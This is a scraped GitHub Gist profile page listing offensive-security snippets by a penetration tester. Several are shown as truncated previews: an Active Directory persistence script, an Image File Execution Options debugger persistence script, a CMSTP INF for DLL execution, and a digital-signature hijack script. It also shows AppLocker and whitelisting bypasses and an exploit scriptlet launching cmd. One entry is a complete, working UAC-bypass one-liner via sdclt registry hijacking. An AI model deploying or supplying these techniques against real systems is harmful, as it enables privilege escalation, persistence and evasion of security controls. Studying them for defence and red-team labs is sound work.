Skip to content

Instantly share code, notes, and snippets.

View netbiosX's full-sized avatar
🎯
Focusing

netbiosX netbiosX

🎯
Focusing
View GitHub Profile
@netbiosX
netbiosX / userAccountControl.ps1
Created January 17, 2022 11:24
PowerShell script to automate domain persistence via the userAccountControl active directory attribute.
function Execute-userAccountControl
{
[CmdletBinding()]
param
(
[System.String]$DomainFQDN = $ENV:USERDNSDOMAIN,
[System.String]$ComputerName = 'Pentestlab',
[System.String]$OSVersion = '10.0 (18363)',
[System.String]$OS = 'Windows 10 Enterprise',
[System.String]$DNSName = "$ComputerName.$DomainFQDN",
@netbiosX
netbiosX / ImageFileExecutionOptions.ps1
Last active June 14, 2024 09:22
Image File Execution Options Injection - Persistence Technique
<#
ImageFileExecutionOptions v1.0
License: GPLv3
Author: @netbiosX
#>
# Image File Execution Options Injection Persistence Technique
# https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/
function Persist-Debugger
@netbiosX
netbiosX / pentestlab-dll.inf
Created May 7, 2018 07:45
CMSTP - Arbitrary DLL execution locally and remotely and SCT for AppLocker Bypass
[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
RegisterOCXs=RegisterOCXSection
[RegisterOCXSection]
C:\Users\test.PENTESTLAB\pentestlab.dll
@netbiosX
netbiosX / DigitalSignature-Hijack.ps1
Last active October 2, 2022 21:31
Hijack Digital Signatures and Bypass Authenticode Hash Validation
<#
DigitalSignatureHijack v1.0
License: GPLv3
Author: @netbiosX
#>
# Validate Digital Signature for PowerShell Scripts
function ValidateSignaturePS
{
$ValidateHashFunc = 'HKLM:\SOFTWARE\Microsoft\Cryptography' +'\OID\EncodingType 0\CryptSIPDllVerifyIndirectData'
@netbiosX
netbiosX / customers.xml
Created July 5, 2017 20:29
Bypass Application Whitelisting via msxsl binary
<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="script.xsl" ?>
<customers>
<customer>
<name>Microsoft</name>
</customer>
</customers>
@netbiosX
netbiosX / Sdclt.ps1
Last active May 11, 2021 08:56
Bypass UAC via sdclt in Windows 10 systems
<#
.SYNOPSIS
This script can bypass User Access Control (UAC) via sdclt.exe for Windows 10.
Author: @netbiosX
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
 
It creates a registry key in: "HKCU:\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" to perform UAC bypass
@netbiosX
netbiosX / sdclt.bat
Created June 9, 2017 07:06
UAC Bypass in Windows 10 via sdclt - batch version
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /d "C:\Windows\System32\cmd.exe" /f && START /W C:\Windows\System32\sdclt.exe && reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f
@netbiosX
netbiosX / FodhelperUACBypass.ps1
Last active October 11, 2024 12:00
Bypass UAC via Fodhelper binary in Windows 10 systems
<#
.SYNOPSIS
This script can bypass User Access Control (UAC) via fodhelper.exe
 
It creates a new registry structure in: "HKCU:\Software\Classes\ms-settings\" to perform UAC bypass and starts
an elevated command prompt.
 
.NOTES
Function : FodhelperUACBypass
File Name : FodhelperUACBypass.ps1
@netbiosX
netbiosX / Shellcode.cs
Created June 6, 2017 00:22
C# file that contains shellcode and bypasses AppLocker via Assembly Load
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
 
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
@netbiosX
netbiosX / pentestlab.sct
Created May 10, 2017 21:48
AppLocker - Regsvr32
<?XML version="1.0"?>
<scriptlet>
<registration
progid="Pentest"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Proof Of Concept - @netbiosX -->
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("cmd /k cd c:\ & pentestlab.exe");